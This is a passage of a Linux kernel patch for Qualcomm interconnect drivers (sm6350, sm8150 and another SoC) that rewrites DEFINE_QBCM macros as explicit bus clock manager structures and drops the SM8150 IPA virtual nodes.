++	.nodes = { &qns_memnoc_snoc },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns2_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 5,
++	.nodes = { &qxm_camnoc_sf, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9 },
++};
++
++static struct qcom_icc_bcm bcm_sh5 = {
++	.name = "SH5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_memnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = false,
++	.num_nodes = 47,
++	.nodes = { &qhm_spdm,
++		   &qhm_tic,
++		   &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_dsp_cfg,
++		   &qhs_cpr_cx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie_gen3_cfg,
++		   &qhs_pdm,
++		   &qhs_phy_refgen_south,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qupv3_north,
++		   &qhs_qupv3_south,
++		   &qhs_sdc2,
++		   &qhs_sdc4,
++		   &qhs_snoc_cfg,
++		   &qhs_spdm,
++		   &qhs_spss_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_north,
++		   &qhs_tlmm_south,
++		   &qhs_tsif,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_cnoc_a2noc,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qhm_qup1, &qhm_qup2 },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_memnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qhs_apss, &srvc_snoc, &xs_sys_tcu_cfg },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pcie },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pcie_gen3 },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &srvc_aggre1_noc, &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn11 = {
++	.name = "SN11",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &srvc_aggre2_noc, &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qnm_gladiator_sodv, &xm_gic },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_pcie_anoc },
++};
++
++static struct qcom_icc_bcm bcm_sn15 = {
++	.name = "SN15",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_memnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_sn9,
+diff --git a/drivers/interconnect/qcom/sm6350.c b/drivers/interconnect/qcom/sm6350.c
+index a3d46e59444e0..aae4b43b730c0 100644
+--- a/drivers/interconnect/qcom/sm6350.c
++++ b/drivers/interconnect/qcom/sm6350.c
+@@ -142,31 +142,233 @@ DEFINE_QNODE(srvc_snoc, SM6350_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SM6350_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SM6350_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy0, &qhs_aoss, &qhs_boot_rom, &qhs_camera_cfg, &qhs_camera_nrt_thrott_cfg, &qhs_camera_rt_throttle_cfg, &qhs_clk_ctl, &qhs_cpr_cx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_display_throttle_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_mss_cfg, &qhs_npu_cfg, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qm_cfg, &qhs_qm_mpu_cfg, &qhs_qup0, &qhs_qup1, &qhs_security, &qhs_snoc_cfg, &qhs_tcsr, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_venus_cfg, &qhs_venus_throttle_cfg, &qhs_vsense_ctrl_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &xm_emmc, &xm_sdc2, &qhs_ahb2phy2, &qhs_emmc_cfg, &qhs_pdm, &qhs_sdc2);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_gemnoc);
+-DEFINE_QBCM(bcm_co2, "CO2", false, &qnm_npu);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_npu_dsp);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", true, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_icp_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf, &qxm_mdp0);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qhm_mnoc_cfg, &qnm_video0, &qnm_video_cvp, &qxm_camnoc_sf);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qup0_core_master, &qup1_core_master, &qup0_core_slave, &qup1_core_slave);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &acm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn10, "SN10", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 41,
++	.nodes = { &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy0,
++		   &qhs_aoss,
++		   &qhs_boot_rom,
++		   &qhs_camera_cfg,
++		   &qhs_camera_nrt_thrott_cfg,
++		   &qhs_camera_rt_throttle_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_display_throttle_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_mss_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qm_cfg,
++		   &qhs_qm_mpu_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_security,
++		   &qhs_snoc_cfg,
++		   &qhs_tcsr,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_venus_cfg,
++		   &qhs_venus_throttle_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 6,
++	.nodes = { &xm_emmc,
++		   &xm_sdc2,
++		   &qhs_ahb2phy2,
++		   &qhs_emmc_cfg,
++		   &qhs_pdm,
++		   &qhs_sdc2
++	},
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_co2 = {
++	.name = "CO2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_npu_dsp },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = true,
++	.num_nodes = 5,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_icp_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf,
++		   &qxm_mdp0
++	},
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qhm_mnoc_cfg, &qnm_video0, &qnm_video_cvp, &qxm_camnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qup0_core_master, &qup1_core_master, &qup0_core_slave, &qup1_core_slave },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn10 = {
++	.name = "SN10",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_cn1,
+diff --git a/drivers/interconnect/qcom/sm8150.c b/drivers/interconnect/qcom/sm8150.c
+index 1d04a4bfea800..685f35bbf5a7c 100644
+--- a/drivers/interconnect/qcom/sm8150.c
++++ b/drivers/interconnect/qcom/sm8150.c
+@@ -56,7 +56,6 @@ DEFINE_QNODE(qnm_pcie, SM8150_MASTER_GEM_NOC_PCIE_SNOC, 1, 16, SM8150_SLAVE_LLCC
+ DEFINE_QNODE(qnm_snoc_gc, SM8150_MASTER_SNOC_GC_MEM_NOC, 1, 8, SM8150_SLAVE_LLCC);
+ DEFINE_QNODE(qnm_snoc_sf, SM8150_MASTER_SNOC_SF_MEM_NOC, 1, 16, SM8150_SLAVE_LLCC);
+ DEFINE_QNODE(qxm_ecc, SM8150_MASTER_ECC, 2, 32, SM8150_SLAVE_LLCC);
+-DEFINE_QNODE(ipa_core_master, SM8150_MASTER_IPA_CORE, 1, 8, SM8150_SLAVE_IPA_CORE);
+ DEFINE_QNODE(llcc_mc, SM8150_MASTER_LLCC, 4, 4, SM8150_SLAVE_EBI_CH0);
+ DEFINE_QNODE(qhm_mnoc_cfg, SM8150_MASTER_CNOC_MNOC_CFG, 1, 4, SM8150_SLAVE_SERVICE_MNOC);
+ DEFINE_QNODE(qxm_camnoc_hf0, SM8150_MASTER_CAMNOC_HF0, 1, 32, SM8150_SLAVE_MNOC_HF_MEM_NOC);
+@@ -139,7 +138,6 @@ DEFINE_QNODE(qns_ecc, SM8150_SLAVE_ECC, 1, 32);
+ DEFINE_QNODE(qns_gem_noc_snoc, SM8150_SLAVE_GEM_NOC_SNOC, 1, 8, SM8150_MASTER_GEM_NOC_SNOC);
+ DEFINE_QNODE(qns_llcc, SM8150_SLAVE_LLCC, 4, 16, SM8150_MASTER_LLCC);
+ DEFINE_QNODE(srvc_gemnoc, SM8150_SLAVE_SERVICE_GEM_NOC, 1, 4);
+-DEFINE_QNODE(ipa_core_slave, SM8150_SLAVE_IPA_CORE, 1, 8);
+ DEFINE_QNODE(ebi, SM8150_SLAVE_EBI_CH0, 4, 4);
+ DEFINE_QNODE(qns2_mem_noc, SM8150_SLAVE_MNOC_SF_MEM_NOC, 1, 32, SM8150_MASTER_MNOC_SF_MEM_NOC);
+ DEFINE_QNODE(qns_mem_noc_hf, SM8150_SLAVE_MNOC_HF_MEM_NOC, 2, 32, SM8150_MASTER_MNOC_HF_MEM_NOC);
+@@ -156,35 +154,262 @@ DEFINE_QNODE(xs_pcie_1, SM8150_SLAVE_PCIE_1, 1, 8);
+ DEFINE_QNODE(xs_qdss_stm, SM8150_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SM8150_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf0, &qxm_camnoc_hf1, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &qns_gem_noc_snoc);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qxm_camnoc_sf, &qns2_mem_noc);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &acm_gpu_tcu, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh5, "SH5", false, &acm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_mem_noc);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_co1, "CO1", false, &qnm_npu);
+-DEFINE_QBCM(bcm_ip0, "IP0", false, &ipa_core_slave);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qhm_spdm, &qnm_snoc, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy_south, &qhs_aop, &qhs_aoss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_dsp, &qhs_cpr_cx, &qhs_cpr_mmcx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_emac_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_npu_cfg, &qhs_pcie0_cfg, &qhs_pcie1_cfg, &qhs_phy_refgen_north, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qspi, &qhs_qupv3_east, &qhs_qupv3_north, &qhs_qupv3_south, &qhs_sdc2, &qhs_sdc4, &qhs_snoc_cfg, &qhs_spdm, &qhs_spss_cfg, &qhs_ssc_cfg, &qhs_tcsr, &qhs_tlmm_east, &qhs_tlmm_north, &qhs_tlmm_south, &qhs_tlmm_west, &qhs_tsif, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_cnoc_a2noc, &srvc_cnoc);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qhm_qup0, &qhm_qup1, &qhm_qup2);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &srvc_aggre1_noc, &srvc_aggre2_noc, &qns_cnoc);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &xs_pcie_0, &xs_pcie_1);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn11, "SN11", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qxm_pimem, &xm_gic);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qns_pcie_mem_noc);
+-DEFINE_QBCM(bcm_sn15, "SN15", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 7,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf0,
++		   &qxm_camnoc_hf1,
++		   &qxm_mdp0,
++		   &qxm_mdp1
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gem_noc_snoc },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_camnoc_sf, &qns2_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &acm_gpu_tcu, &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm3 = {
++	.name = "MM3",
++	.keepalive = false,
++	.num_nodes = 4,
++	.nodes = { &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9 },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh5 = {
++	.name = "SH5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_co1 = {
++	.name = "CO1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 53,
++	.nodes = { &qhm_spdm,
++		   &qnm_snoc,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy_south,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_dsp,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mmcx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_emac_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie1_cfg,
++		   &qhs_phy_refgen_north,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qspi,
++		   &qhs_qupv3_east,
++		   &qhs_qupv3_north,
++		   &qhs_qupv3_south,
++		   &qhs_sdc2,
++		   &qhs_sdc4,
++		   &qhs_snoc_cfg,
++		   &qhs_spdm,
++		   &qhs_spss_cfg,
++		   &qhs_ssc_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_east,
++		   &qhs_tlmm_north,
++		   &qhs_tlmm_south,
++		   &qhs_tlmm_west,
++		   &qhs_tsif,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_cnoc_a2noc,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qhm_qup0, &qhm_qup1, &qhm_qup2 },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &srvc_aggre1_noc, &srvc_aggre2_noc, &qns_cnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &xs_pcie_0, &xs_pcie_1 },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn11 = {
++	.name = "SN11",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_pimem, &xm_gic },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_pcie_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn15 = {
++	.name = "SN15",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_qup0,
+@@ -398,22 +623,6 @@ static const struct qcom_icc_desc sm8150_gem_noc = {
+ 	.num_bcms = ARRAY_SIZE(gem_noc_bcms),
+ };
+ 
+-static struct qcom_icc_bcm * const ipa_virt_bcms[] = {
+-	&bcm_ip0,
+-};
+-
+-static struct qcom_icc_node * const ipa_virt_nodes[] = {
+-	[MASTER_IPA_CORE] = &ipa_core_master,
+-	[SLAVE_IPA_CORE] = &ipa_core_slave,
+-};
+-
+-static const struct qcom_icc_desc sm8150_ipa_virt = {
+-	.nodes = ipa_virt_nodes,
+-	.num_nodes = ARRAY_SIZE(ipa_virt_nodes),
+-	.bcms = ipa_virt_bcms,
+-	.num_bcms = ARRAY_SIZE(ipa_virt_bcms),
+-};
+-
+ static struct qcom_icc_bcm * const mc_virt_bcms[] = {
+ 	&bcm_acv,
+ 	&bcm_mc0,
